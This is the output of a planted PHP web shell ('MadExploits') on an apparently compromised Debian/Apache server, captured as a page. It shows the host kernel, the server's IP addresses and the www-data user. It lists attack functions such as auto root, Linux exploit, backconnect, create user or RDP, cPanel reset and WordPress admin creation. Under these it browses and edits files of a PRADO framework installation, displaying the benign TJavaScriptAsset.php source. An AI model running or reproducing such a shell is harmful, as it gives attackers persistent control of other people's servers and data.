Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.223.241.235
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
ifk /
web /
prado4.3.2 /
Web /
Javascripts /
[ HOME SHELL ]
Name
Size
Permission
Action
source
[ DIR ]
drwxr-xr-x
TJavaScript.php
7.72
KB
-rw-r--r--
TJavaScriptAsset.php
1.22
KB
-rw-r--r--
TJavaScriptLiteral.php
1.34
KB
-rw-r--r--
TJavaScriptString.php
738
B
-rw-r--r--
css-packages.php
2.66
KB
-rw-r--r--
packages.php
2.99
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : TJavaScriptAsset.php
<?php /** * TJavaScriptAsset classes * * @author Brad Anderson <belisoful@icloud.com> * @link https://github.com/pradosoft/prado * @license https://github.com/pradosoft/prado/blob/master/LICENSE */ namespace Prado\Web\Javascripts; use Prado\Web\THttpUtility; /** * TJavaScriptAsset class. * * TJavaScriptAsset class is a utility class for passing javascript * asset files between components of PRADO. This class contains * the URL of the asset and whether or not to load it asynchronously. * * This renders the html script tag (with or w/o async) via __toString. * * @author Brad Anderson <belisoful@icloud.com> * @since 4.2.0 */ class TJavaScriptAsset { protected $_url; protected $_async; public function __construct($url, $async = false) { $this->_url = $url; $this->_async = $async; } public function __toString() { $async = $this->getAsync() ? 'async ' : ''; return '<script ' . $async . 'src="' . THttpUtility::htmlEncode($this->getUrl()) . '"></script>'; } public function getUrl() { return $this->_url; } public function setUrl($url) { $this->_url = $url; } public function getAsync() { return $this->_async; } public function setAsync($async) { $this->_async = $async; } }
Close